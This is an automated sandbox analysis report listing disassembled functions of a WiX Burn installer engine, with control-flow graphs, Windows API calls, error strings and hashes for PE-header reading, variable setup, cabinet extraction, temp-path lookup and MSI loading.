                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                  • Opcode ID: b8678ee7f1a994d0309e9e9124e80a7c282bb36f050a228a897a9667d454d686
                                                                                                                                                                  • Instruction ID: 37717965b776a381f6134053ff2d1353c612d26bb619ef21b529d04a262544a0
                                                                                                                                                                  • Opcode Fuzzy Hash: b8678ee7f1a994d0309e9e9124e80a7c282bb36f050a228a897a9667d454d686
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CC012331A8208A78B006FF4DC0AC85779CA7586027008550B519C6021C638E0909760
                                                                                                                                                                  Function 0091DB61 Relevance: 95.2, APIs: 24, Strings: 30, Instructions: 688fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 0 91db61-91dbd6 call 957460 * 2 5 91dc18-91dc1e 0->5 6 91dbd8-91dbe2 GetLastError 0->6 9 91dc20 5->9 10 91dc22-91dc32 SetFilePointerEx 5->10 7 91dbe4-91dbed 6->7 8 91dbef 6->8 7->8 11 91dbf1 8->11 12 91dbf6-91dc13 call 911225 8->12 9->10 13 91dc74-91dc8c ReadFile 10->13 14 91dc34-91dc3e GetLastError 10->14 11->12 31 91e3ea-91e3f0 call 911228 12->31 17 91dcce-91dcd5 13->17 18 91dc8e-91dc98 GetLastError 13->18 15 91dc40-91dc49 14->15 16 91dc4b 14->16 15->16 20 91dc52-91dc6f call 911225 16->20 21 91dc4d 16->21 25 91e3c6-91e3e8 call 911225 17->25 26 91dcdb-91dce4 17->26 22 91dca5 18->22 23 91dc9a-91dca3 18->23 20->31 21->20 29 91dca7 22->29 30 91dcac-91dcc9 call 911225 22->30 23->22 25->31 26->25 27 91dcea-91dcfc SetFilePointerEx 26->27 34 91dd3e-91dd59 ReadFile 27->34 35 91dcfe-91dd08 GetLastError 27->35 29->30 30->31 47 91e3f3-91e403 call 9567e6 31->47 42 91dd9b-91dda2 34->42 43 91dd5b-91dd65 GetLastError 34->43 40 91dd15 35->40 41 91dd0a-91dd13 35->41 48 91dd17 40->48 49 91dd1c-91dd39 call 911225 40->49 41->40 45 91e3a0-91e3c4 call 911225 42->45 46 91dda8-91ddb2 42->46 50 91dd72 43->50 51 91dd67-91dd70 43->51 45->31 46->45 52 91ddb8-91dddd SetFilePointerEx 46->52 48->49 49->31 56 91dd74 50->56 57 91dd79-91dd96 call 911225 50->57 51->50 58 91de1f-91de3a ReadFile 52->58 59 91dddf-91dde9 GetLastError 52->59 56->57 57->31 66 91de7c-91de97 ReadFile 58->66 67 91de3c-91de46 GetLastError 58->67 64 91ddf6 59->64 65 91ddeb-91ddf4 59->65 71 91ddf8 64->71 72 91ddfd-91de1a call 911225 64->72 65->64 69 91ded9-91def6 SetFilePointerEx 66->69 70 91de99-91dea3 GetLastError 66->70 73 91de53 67->73 74 91de48-91de51 67->74 78 91df38-91df5a ReadFile 69->78 79 91def8-91df02 GetLastError 69->79 75 91deb0 70->75 76 91dea5-91deae 70->76 71->72 72->31 80 91de55 73->80 81 91de5a-91de77 call 911225 73->81 74->73 85 91deb2 75->85 86 91deb7-91ded4 call 911225 75->86 76->75 83 91dfbc-91dfc6 GetLastError 78->83 84 91df5c-91df5e 78->84 88 91df04-91df0d 79->88 89 91df0f 79->89 80->81 81->31 93 91dfd3 83->93 94 91dfc8-91dfd1 83->94 91 91df5f-91df66 84->91 85->86 86->31 88->89 95 91df11 89->95 96 91df16-91df33 call 911225 89->96 98 91e36a-91e38e call 911225 91->98 99 91df6c-91df78 91->99 101 91dfd5 93->101 102 91dfda-91e009 call 911225 call 911228 93->102 94->93 95->96 96->31 116 91e393-91e39e call 911228 98->116 105 91df87-91df90 99->105 106 91df7a-91df81 99->106 101->102 102->47 110 91e321-91e338 call 911225 105->110 111 91df96-91dfba ReadFile 105->111 106->105 109 91e00e-91e015 106->109 114 91e047-91e05e call 91540b 109->114 115 91e017-91e042 call 911225 109->115 126 91e33d-91e34c call 911228 110->126 111->83 111->91 127 91e060-91e08a call 911225 114->127 128 91e08f-91e0a4 SetFilePointerEx 114->128 115->116 116->47 139 91e34e 126->139 127->31 131 91e0a6-91e0b0 GetLastError 128->131 132 91e0ef-91e112 ReadFile 128->132 137 91e0b2-91e0bb 131->137 138 91e0bd 131->138 134 91e114-91e11e GetLastError 132->134 135 91e14b-91e157 132->135 144 91e120-91e129 134->144 145 91e12b 134->145 140 91e159-91e175 call 911225 135->140 141 91e17a-91e17e 135->141 137->138 142 91e0c4-91e0d6 call 911225 138->142 143 91e0bf 138->143 146 91e351-91e359 139->146 140->126 150 91e180-91e1a6 call 911225 141->150 151 91e1bb-91e1c4 141->151 162 91e0db-91e0ea call 911228 142->162 143->142 144->145 152 91e132-91e149 call 911225 145->152 153 91e12d 145->153 146->47 147 91e35f-91e365 call 9155c9 146->147 147->47 169 91e1ab-91e1b6 call 911228 150->169 158 91e1f3-91e206 call 973b63 151->158 159 91e1c6-91e1f1 call 911225 151->159 152->162 153->152 171 91e224-91e234 158->171 172 91e208-91e21a 158->172 159->169 162->139 169->146 175 91e236-91e23c 171->175 176 91e23e-91e246 171->176 172->171 178 91e257-91e2b1 call 91540b 175->178 179 91e252-91e255 176->179 180 91e248-91e250 176->180 183 91e2b3-91e2d8 call 911225 178->183 184 91e2e2-91e303 call 9575c0 call 91d84a 178->184 179->178 180->178 183->184 184->146 191 91e305-91e317 call 911225 184->191 191->110
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00916C5C,00000000,00916570), ref: 0091DBD8
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DC2A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00916C5C,00000000,00916570), ref: 0091DC34
                                                                                                                                                                  • ReadFile.KERNELBASE(00916570,00916C78,00000040,?,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DC84
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00916C5C,00000000,00916570), ref: 0091DC8E
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00916570,00916570,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DCF4
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DCFE
                                                                                                                                                                  • ReadFile.KERNELBASE(00916570,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DD51
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DD5B
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00916570,009164D8,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DDD5
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DDDF
                                                                                                                                                                  • ReadFile.KERNEL32(00916570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE32
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE3C
                                                                                                                                                                  • ReadFile.KERNEL32(00916570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE8F
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE99
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00916570,00916570,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DEEE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DEF8
                                                                                                                                                                  • ReadFile.KERNEL32(00916570,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DF52
                                                                                                                                                                  • ReadFile.KERNEL32(00916570,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DFB2
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DFBC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$Read$Pointer
                                                                                                                                                                  • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data too short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$Invalid section info, cContainers too large: %u$PE$PE Header from file didn't match PE Header in memory.$burn$d:\a\wix4\wix4\src\burn\engine\section.cpp$feclient.dll
                                                                                                                                                                  • API String ID: 3909885910-3741805499
                                                                                                                                                                  • Opcode ID: 714c8a906a75f2f34fd099da25cd552fd226764726bf39ba92bbee1b1ab64d5c
                                                                                                                                                                  • Instruction ID: 0d18b0a9d0fefed5ad888c08734f2094af6306d7040b625bd9769898a6c16409
                                                                                                                                                                  • Opcode Fuzzy Hash: 714c8a906a75f2f34fd099da25cd552fd226764726bf39ba92bbee1b1ab64d5c
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A22F972B41338B7E7319A148C46FEBB5ACAF45B14F014559FE19BB3C0E2B49D818B94
                                                                                                                                                                  Function 0091AA6F Relevance: 54.5, APIs: 1, Strings: 35, Instructions: 486COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 364 91aa6f-91b442 InitializeCriticalSection 365 91b448-91b46c call 91813a 364->365 368 91b4ba-91b4cd 365->368 369 91b46e-91b481 365->369 371 91b4d2-91b4dc call 911228 368->371 369->365 370 91b483-91b49b call 918218 369->370 376 91b4a5-91b4b8 370->376 377 91b49d-91b4a1 370->377 378 91b4df-91b4ef call 9567e6 371->378 376->371 377->370 379 91b4a3 377->379 379->378
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(0093401A,00917D5B,x86,00917DDB), ref: 0091AA8F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                  • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$Failed to add well-known variable: %ls.$InstallerName$InstallerVersion$LogonUser$RebootPending$SeShutdownPrivilege$WixBundleAction$WixBundleActiveParent$WixBundleCommandLineAction$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInProgressName$WixBundleInstalled$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleManufacturer$WixBundleName$WixBundleOriginalSource$WixBundleOriginalSourceFolder$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp$x86
                                                                                                                                                                  • API String ID: 32694325-1675731463
                                                                                                                                                                  • Opcode ID: b696f6cc25ed1a54bb139487c95dce3394df1d89e2d6bf91a3b02a5e4a2c95b3
                                                                                                                                                                  • Instruction ID: f7e4f638f2ea306677f8760ba59f12fdbc72c90ef970ab0c4bdf3825df4fbf1e
                                                                                                                                                                  • Opcode Fuzzy Hash: b696f6cc25ed1a54bb139487c95dce3394df1d89e2d6bf91a3b02a5e4a2c95b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 635258B0D217289FDB65DF59C9487CAFAF8BB48744F5085EAE10CA6350D7B00A89CF85
                                                                                                                                                                  Function 0093E386 Relevance: 47.6, APIs: 16, Strings: 11, Instructions: 351COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 382 93e386-93e39d SetEvent 383 93e3e5-93e3f3 call 91174a 382->383 384 93e39f-93e3a9 GetLastError 382->384 392 93e3f5-93e414 call 911228 383->392 393 93e419-93e424 ResetEvent 383->393 385 93e3b6 384->385 386 93e3ab-93e3b4 384->386 388 93e3b8 385->388 389 93e3bd-93e3e0 call 911225 385->389 386->385 388->389 400 93e7d8 389->400 410 93e7e4-93e7e9 392->410 396 93e426-93e430 GetLastError 393->396 397 93e46c-93e472 393->397 402 93e432-93e43b 396->402 403 93e43d 396->403 398 93e4b2-93e4cb call 912ec6 397->398 399 93e474-93e477 397->399 420 93e4f4-93e4ff SetEvent 398->420 421 93e4cd-93e4ef call 911228 398->421 406 93e479-93e4a3 call 911225 399->406 407 93e4a8-93e4ad 399->407 408 93e7d9-93e7de call 911228 400->408 402->403 404 93e444-93e467 call 911225 403->404 405 93e43f 403->405 404->400 405->404 406->400 407->410 424 93e7e1-93e7e3 408->424 414 93e7eb 410->414 415 93e7ee-93e7f4 410->415 414->415 422 93e501-93e50b GetLastError 420->422 423 93e547-93e555 call 91174a 420->423 421->424 426 93e518 422->426 427 93e50d-93e516 422->427 434 93e573-93e57e ResetEvent 423->434 435 93e557-93e56e 423->435 424->410 430 93e51a 426->430 431 93e51f-93e542 call 911225 426->431 427->426 430->431 431->400 437 93e580-93e58a GetLastError 434->437 438 93e5c6-93e5cd 434->438 435->408 441 93e597 437->441 442 93e58c-93e595 437->442 439 93e5d3-93e5d6 438->439 440 93e66d-93e690 CreateFileW 438->440 447 93e622-93e626 call 91540b 439->447 448 93e5d8-93e5db 439->448 445 93e692-93e69c GetLastError 440->445 446 93e6dc-93e6ee SetFilePointerEx 440->446 443 93e599 441->443 444 93e59e-93e5c1 call 911225 441->444 442->441 443->444 444->400 450 93e6a9 445->450 451 93e69e-93e6a7 445->451 454 93e6f0-93e6fa GetLastError 446->454 455 93e736-93e741 SetEndOfFile 446->455 466 93e62b-93e630 447->466 452 93e61b-93e61d 448->452 453 93e5dd-93e5e0 448->453 460 93e6b0-93e6d6 call 911225 450->460 461 93e6ab 450->461 451->450 452->410 462 93e5e2-93e60c call 911225 453->462 463 93e611-93e616 453->463 464 93e707 454->464 465 93e6fc-93e705 454->465 458 93e743-93e74d GetLastError 455->458 459 93e786-93e795 SetFilePointerEx 455->459 471 93e75a 458->471 472 93e74f-93e758 458->472 459->424 475 93e797-93e7a1 GetLastError 459->475 460->446 461->460 462->400 463->424 469 93e709 464->469 470 93e70e-93e731 call 911225 464->470 465->464 467 93e632-93e65a call 911225 466->467 468 93e65f-93e668 466->468 467->400 468->424 469->470 470->400 478 93e761-93e784 call 911225 471->478 479 93e75c 471->479 472->471 482 93e7a3-93e7ac 475->482 483 93e7ae 475->483 478->400 479->478 482->483 484 93e7b0 483->484 485 93e7b5-93e7d3 call 911225 483->485 484->485 485->400
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,0093DE75,?,?), ref: 0093E395
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0093DE75,?,?), ref: 0093E39F
                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,000000FF,?,?,?,?,0093DE75,?,?), ref: 0093E41C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0093DE75,?,?), ref: 0093E426
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorEventLast$Reset
                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %hs$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 1970322416-1884393483
                                                                                                                                                                  • Opcode ID: df9c414a0029739b1c0511d27084fa6ac69d995bd77b4ac63a4b15fd5307a3b9
                                                                                                                                                                  • Instruction ID: 5c78417d7ca2d94ba4cbf4fb838c3626e423775214800083c7c1afe4a6161f65
                                                                                                                                                                  • Opcode Fuzzy Hash: df9c414a0029739b1c0511d27084fa6ac69d995bd77b4ac63a4b15fd5307a3b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 76A1E237BC133273EB3256695C4FFAB29589B85F20F120114BE19BF2E1E6A4DC409AD4
                                                                                                                                                                  Function 00976323 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 236registrylibraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 568 976323-97634c call 911839 571 97634e-976367 call 911228 568->571 572 97636c-976384 GetProcAddress 568->572 579 976586-97658a 571->579 574 976411-976431 call 96cba8 572->574 575 97638a-97639e GetCurrentProcess call 96beb7 572->575 584 976444-976446 574->584 585 976433-976439 574->585 586 9763b1-9763b5 575->586 587 9763a0-9763ac 575->587 582 97658c-976595 RegCloseKey 579->582 583 976599-97659d 579->583 582->583 589 9765a7-9765ab 583->589 590 97659f-9765a2 call 91367f 583->590 592 976448-97644a 584->592 585->584 591 97643b-976442 585->591 586->574 588 9763b7-9763c9 call 97234b 586->588 593 976565-976572 call 911228 587->593 605 9763dc-9763ee call 915573 588->605 606 9763cb-9763d7 588->606 590->589 591->592 594 97645d-97645f 592->594 595 97644c-976458 592->595 603 976584-976585 593->603 600 976465-97647a call 976232 594->600 601 976523-976535 call 97234b 594->601 595->593 611 97648d-976490 600->611 612 97647c-976488 600->612 614 976537-976543 601->614 615 976545-976557 call 915573 601->615 603->579 618 976401-97640f 605->618 619 9763f0-9763fc 605->619 606->593 616 9764c7-9764d3 call 976232 611->616 617 976492-9764a4 call 915573 611->617 612->593 614->593 625 976574-976582 615->625 626 976559-976563 615->626 627 9764d8-9764dc 616->627 628 9764b7-9764c5 617->628 629 9764a6-9764b2 617->629 618->574 619->593 625->603 626->593 630 9764de-9764ea 627->630 631 9764ec-9764ef 627->631 628->616 629->593 630->593 631->601 632 9764f1-976503 call 915573 631->632 635 976505-976511 632->635 636 976513-976521 632->636 635->593 636->601
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00976376
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 0097638E
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000004,00000001,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019,00000000), ref: 0097658F
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp, xrefs: 0097635A, 00976565
                                                                                                                                                                  • kernel32.dll, xrefs: 0097633E
                                                                                                                                                                  • TEMP, xrefs: 009764CB, 00976527
                                                                                                                                                                  • Failed to get system Windows subdirectory path TEMP., xrefs: 00976537
                                                                                                                                                                  • Failed to ensure array size for Windows\TEMP value., xrefs: 00976559
                                                                                                                                                                  • Failed to check if running as system., xrefs: 009763A0
                                                                                                                                                                  • Failed to get system Windows subdirectory path SystemTemp., xrefs: 009763CB
                                                                                                                                                                  • System\CurrentControlSet\Control\Session Manager\Environment, xrefs: 0097641A
                                                                                                                                                                  • Failed to ensure array size for system TMP value., xrefs: 009764A6
                                                                                                                                                                  • Failed to ensure array size for Windows\SystemTemp value., xrefs: 009763F0
                                                                                                                                                                  • GetTempPath2W, xrefs: 0097636E
                                                                                                                                                                  • Failed to get temp path from system TMP., xrefs: 0097647C
                                                                                                                                                                  • TMP, xrefs: 00976469
                                                                                                                                                                  • SystemTemp, xrefs: 009763BB
                                                                                                                                                                  • Failed to load kernel32.dll, xrefs: 0097634E
                                                                                                                                                                  • Failed to open system environment registry key., xrefs: 0097644C
                                                                                                                                                                  • Failed to ensure array size for system TEMP value., xrefs: 00976505
                                                                                                                                                                  • Failed to get temp path from system TEMP., xrefs: 009764DE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCurrentErrorLastLibraryLoadProcProcess
                                                                                                                                                                  • String ID: Failed to check if running as system.$Failed to ensure array size for Windows\SystemTemp value.$Failed to ensure array size for Windows\TEMP value.$Failed to ensure array size for system TEMP value.$Failed to ensure array size for system TMP value.$Failed to get system Windows subdirectory path SystemTemp.$Failed to get system Windows subdirectory path TEMP.$Failed to get temp path from system TEMP.$Failed to get temp path from system TMP.$Failed to load kernel32.dll$Failed to open system environment registry key.$GetTempPath2W$SystemTemp$System\CurrentControlSet\Control\Session Manager\Environment$TEMP$TMP$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp$kernel32.dll
                                                                                                                                                                  • API String ID: 1593934338-44121869
                                                                                                                                                                  • Opcode ID: 07552b6f0860a47db2dcec28aa3da5441c7eb93dc31eb47c88e3878750712f59
                                                                                                                                                                  • Instruction ID: 6f5b872ff3404cc6d7a797bde5ee957408de1a9c9b8e81c089de03c393745ecc
                                                                                                                                                                  • Opcode Fuzzy Hash: 07552b6f0860a47db2dcec28aa3da5441c7eb93dc31eb47c88e3878750712f59
                                                                                                                                                                  • Instruction Fuzzy Hash: 9271D973F80B25FBDB219A50CC4BFAE7A64DF45B55F158050BA087A1D1E7B49E40DAC0
                                                                                                                                                                  Function 0096F5A7 Relevance: 36.8, APIs: 9, Strings: 12, Instructions: 96libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 637 96f5a7-96f5c7 call 9118c0 640 96f5ea-96f5f7 call 973be0 637->640 641 96f5c9-96f5e5 call 911228 637->641 645 96f5fc-96f619 GetProcAddress 640->645 648 96f740-96f744 641->648 646 96f620-96f63d GetProcAddress 645->646 647 96f61b 645->647 649 96f644-96f661 GetProcAddress 646->649 650 96f63f 646->650 647->646 651 96f746-96f749 call 91367f 648->651 652 96f74e-96f752 648->652 653 96f663 649->653 654 96f668-96f685 GetProcAddress 649->654 650->649 651->652 653->654 656 96f687 654->656 657 96f68c-96f6a9 GetProcAddress 654->657 656->657 658 96f6b0-96f6cd GetProcAddress 657->658 659 96f6ab 657->659 660 96f6d4-96f6f1 GetProcAddress 658->660 661 96f6cf 658->661 659->658 662 96f6f3 660->662 663 96f6f8-96f6ff 660->663 661->660 662->663 664 96f717-96f71e 663->664 665 96f701-96f712 GetProcAddress 663->665 666 96f736 664->666 667 96f720-96f731 GetProcAddress 664->667 665->664 666->648 667->666
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 0096F607
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 0096F62B
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 0096F64F
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 0096F673
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 0096F697
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 0096F6BB
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 0096F6DF
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiBeginTransactionW), ref: 0096F70C
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEndTransaction), ref: 0096F72B
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp, xrefs: 0096F5D8
                                                                                                                                                                  • MsiBeginTransactionW, xrefs: 0096F701
                                                                                                                                                                  • MsiEnumProductsExW, xrefs: 0096F644
                                                                                                                                                                  • Msi.dll, xrefs: 0096F5B9
                                                                                                                                                                  • MsiSetExternalUIRecord, xrefs: 0096F6B0
                                                                                                                                                                  • MsiDeterminePatchSequenceW, xrefs: 0096F5FC
                                                                                                                                                                  • MsiGetProductInfoExW, xrefs: 0096F68C
                                                                                                                                                                  • Failed to load Msi.DLL, xrefs: 0096F5C9
                                                                                                                                                                  • MsiEndTransaction, xrefs: 0096F720
                                                                                                                                                                  • MsiDetermineApplicablePatchesW, xrefs: 0096F620
                                                                                                                                                                  • MsiSourceListAddSourceExW, xrefs: 0096F6D4
                                                                                                                                                                  • MsiGetPatchInfoExW, xrefs: 0096F668
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
